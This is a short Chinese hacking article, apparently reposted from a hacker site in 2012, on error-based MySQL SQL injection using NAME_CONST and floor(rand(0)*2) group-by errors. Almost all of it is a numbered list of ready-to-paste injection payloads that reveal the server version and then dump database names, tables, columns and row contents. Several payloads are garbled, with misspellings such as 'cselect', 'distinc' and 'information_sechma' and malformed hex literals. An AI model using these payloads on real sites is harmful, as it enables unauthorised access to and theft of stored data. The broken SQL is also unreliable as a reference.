MYSQL高版本报错注入技巧-利用NAME_CONST注入

MYSQL高版本报错注入技巧-利用NAME_CONST注入

来源：本站转载 作者：佚名 时间：2012-03-13 TAG：

and (select count(*) from mysql.user)>0/*

http://www.myhack58.com/Article/html/3/7/2012/33330.htm

1、查看MYSQL版本

and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)

2、爆所有库

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,schema_name,0×27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x
from information_schema.tables group by x)a) and 1=1

3、爆当前数据库

and(select 1 from(select count(*),concat((select cselect concat(0x7e,0×27,hex(cast(database() as char)),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1

4、爆表

and(select 1 from(select count(*),concat((select (select (select distinc concat(0x7e,0×27,hex(cast(table_name as char)),0×27,0x7e) from information_schema.tables where table_schema=hex库名limit 1,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

5、爆字段

and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0×27,column_name,0×27,0x7e) from information_sechma.columns where table_schema=库名and table_name=表名limit 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

6、爆内容

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,表名.字段,0×27,0x7e) from 表名limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1